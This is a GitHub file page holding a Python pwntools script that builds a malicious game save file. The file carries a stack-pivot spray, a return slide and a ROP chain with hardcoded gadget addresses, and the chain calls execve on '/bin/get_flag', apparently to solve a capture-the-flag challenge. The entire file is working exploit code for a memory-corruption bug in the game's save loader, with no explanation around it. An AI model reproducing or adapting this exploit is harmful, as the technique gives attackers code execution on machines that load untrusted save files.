-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathgenerate_exploit_savefile.py
executable file
·76 lines (65 loc) · 2.6 KB
/
generate_exploit_savefile.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/env python3
from pwn import p8, p16, p32, p64
from pwnlib.rop import ROP
def main():
b = p16(1) + p16(1) + p16(61) + p16(0) # some version
b += p8(0) # quality version
b += p8(0) # ?
b += p8(0) # ?
b += p8(0) # ?
b += p8(1) # difficulty
b += p8(0) # finished
b += p8(0) # playerWon
b += p8(0) # nextLevel -> string
b += p8(0) # canContinue
b += p8(0) # finishedButContinuing
b += p8(0) # saving replay
b += p8(1) # allow non admin debug options
b += p8(1) + p8(1) + p8(0x3b) # application version "loadedfrom"
b += p16(0xe9bf) # buildVersion
b += p8(1) # allowed commands
b += p8(0) # no mods, not even base lol
b += p32(0) # startup settings crc
b += p8(3) + p8(0) # value 3 for result?
b += p8(0) # bool false to get into the if
b += p8(0xff) * 5 # encoding an int (-1)
binary_end = 0x278f000
slide_target = 0xe000000 # the place we hope to find our return slide at
mov_rsp_rcx = 0x2043fa4 # 0x2043fa4: mov rsp, rcx; ret;
stack_pivot = p64(slide_target)
stack_pivot += p64(slide_target)
stack_pivot += p64(mov_rsp_rcx)
stack_pivot += p64(mov_rsp_rcx)
b += stack_pivot * int(0x200000 / 8)
rop_chain = ROP([])
execution_target = '/bin/get_flag\0'.ljust(16, '\0')
# --- write execution target string to memory
rop_chain.raw(0x40e2d4) # pop rsi; ret;
rop_chain.raw(execution_target[:8]) # value for rsi
rop_chain.raw(0x40e86b) # pop rax; ret;
rop_chain.raw(0x027920e0) # value for rax (.data as write target)
rop_chain.raw(0x0000000001c73b08) # mov qword ptr [rax], rsi; ret;
# --
rop_chain.raw(0x40e2d4) # pop rsi; ret;
rop_chain.raw(execution_target[8:]) # value for rsi
rop_chain.raw(0x40e86b) # pop rax; ret;
rop_chain.raw(0x027920e0 + 8) # value for rax (.data as write target)
rop_chain.raw(0x1c73b08) # mov qword ptr [rax], rsi; ret;
# --- syscall
rop_chain.raw(0x40e86b) # pop rax; ret;
rop_chain.raw(59) # value for rax (syscall number)
rop_chain.raw(0x40e150) # pop rdi; ret;
rop_chain.raw(0x027920e0) # value for rdi (.data as read target)
rop_chain.raw(0x40e2d4) # pop rsi; ret;
rop_chain.raw(0) # value for rsi
rop_chain.raw(0x40e68f) # pop rdx; ret;
rop_chain.raw(0) # value for rdx
rop_chain.raw(0x42c4d6) # syscall
return_slide = p64(0xbf1f1c) # ret
b += return_slide * int(0x4000000 / 8)
print(rop_chain.dump())
b += rop_chain.chain()
b += p8(0) * (4294967334 - len(b))
open("pwn/level.dat", "wb").write(b)
if __name__ == "__main__":
main()